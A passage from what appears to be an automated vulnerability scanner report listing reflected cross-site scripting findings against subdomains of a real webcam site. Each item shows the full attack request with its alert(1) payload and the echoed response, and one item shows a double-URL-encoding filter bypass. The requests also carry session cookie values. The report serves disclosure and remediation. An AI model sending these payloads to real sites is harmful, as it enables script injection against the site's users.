User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RqcP8Em5lcLL9tsXaD3uSCr; spvdr=vd=6cc73906-033c-4d11-ab66-338112d0ebd8&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=wgmkqeerdlg5k445ra3fuif4;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ide=d1L8nYGrPxxKfmvRaNCT6s6MpjdKe%2bsvHgUcdJmSzWWUOCRgxkUhM1pMfPg4ve7KJ4HmML4ZGtxedHgz3z0VeDDHT7ms46J7zdPnECvs0RpBZF1m2IzH82rPBFJ4in81; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:15 GMT
Connection: close
Content-Length: 23378


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583b8f5f"><script>alert(1)</script>74d0037b57&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.27. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31330"><script>alert(1)</script>1979371c19a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31330"><script>alert(1)</script>1979371c19a=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fhoqceug33qmnu45dn3rjvyl; path=/; HttpOnly
Set-Cookie: spvdr=vd=08c8b62a-81bb-4ccd-978f-3cf95bc4ad01&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:07 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:07 GMT
Connection: close
Content-Length: 19081
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||31330"><script>alert(1)</script>1979371c19a~1');return false;">
...[SNIP]...

2.28. http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669d4'-alert(1)-'409ace51e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?669d4'-alert(1)-'409ace51e58=1 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bwwvfz45rdxmr0upkhiua545; path=/; HttpOnly
Set-Cookie: spvdr=vd=3a08158f-8d99-43ce-b530-e98b6793f7a9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:08 GMT; path=/
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 18680
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=dk.imlive.com&ul=/?669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&qs=669d4'-alert(1)-'409ace51e58=1&iy=dallas&id=44&iu=1&vd=3a08158f-8d99-43ce-b530-e98b6793f7a9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.29. http://dk.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39b96"><script>alert(1)</script>aa918e4b7e3 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:58 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=39b96"><script>alert(1)</script>aa918e4b7e3&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.30. http://dk.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d099c"><script>alert(1)</script>1462ebc3ff2 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d099c"><script>alert(1)</script>1462ebc3ff2&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.31. http://dk.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 was submitted in the gotopage parameter. This input was echoed as 2babb'style='x:expression(alert(1))'730ccb26132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=2babb%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527730ccb26132 HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: idk=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQQSTSCRD=JCBCPJMAPKIPKJHFCJIAJBAC; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:16 GMT
Connection: close
Content-Length: 8330
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=dk.imlive.com&ul=/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://dk.imlive.com:80/waccess/2babb'style='x:expression(alert(1))'730ccb26132/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.32. http://dk.imlive.com/waccess/ [promocode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dk.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c286"><script>alert(1)</script>f1e7aab618f was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: dk.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=481b3f25-6cc2-41ad-b084-4179e10ea860&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=clna3wbxqiryybmrnfs1zj45; idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: idk=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:53 GMT
Connection: close
Content-Length: 23170


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA55834c286"><script>alert(1)</script>f1e7aab618f&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.33. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f845"><script>alert(1)</script>2a1f57da1a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8f845"><script>alert(1)</script>2a1f57da1a5=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bzoxfdq1j0rhaea2ljjw2lbj; path=/; HttpOnly
Set-Cookie: spvdr=vd=903513d8-3e33-4831-96f3-029102fe04ec&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:08 GMT
Connection: close
Content-Length: 19524
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||8f845"><script>alert(1)</script>2a1f57da1a5~1');return false;">
...[SNIP]...

2.34. http://es.imlive.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ff3'-alert(1)-'a75b4d32011 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?86ff3'-alert(1)-'a75b4d32011=1 HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ibmiiozn3j23cc45g5at3h55; path=/; HttpOnly
Set-Cookie: spvdr=vd=ba938df6-402f-42af-9e74-39a2f773e158&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:09 GMT; path=/
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:09 GMT
Connection: close
Content-Length: 19123
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=es.imlive.com&ul=/?86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&qs=86ff3'-alert(1)-'a75b4d32011=1&iy=dallas&id=44&iu=1&vd=ba938df6-402f-42af-9e74-39a2f773e158';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.35. http://es.imlive.com/waccess/ [cbname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52d7"><script>alert(1)</script>569b58da610 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:24 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=c52d7"><script>alert(1)</script>569b58da610&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.36. http://es.imlive.com/waccess/ [from parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd0ed"><script>alert(1)</script>3940b74ef04 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: es.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:46:29 GMT
Connection: close
Content-Length: 23570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-ES" lang="es-ES" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.37. http://es.imlive.com/waccess/ [gotopage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://es.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

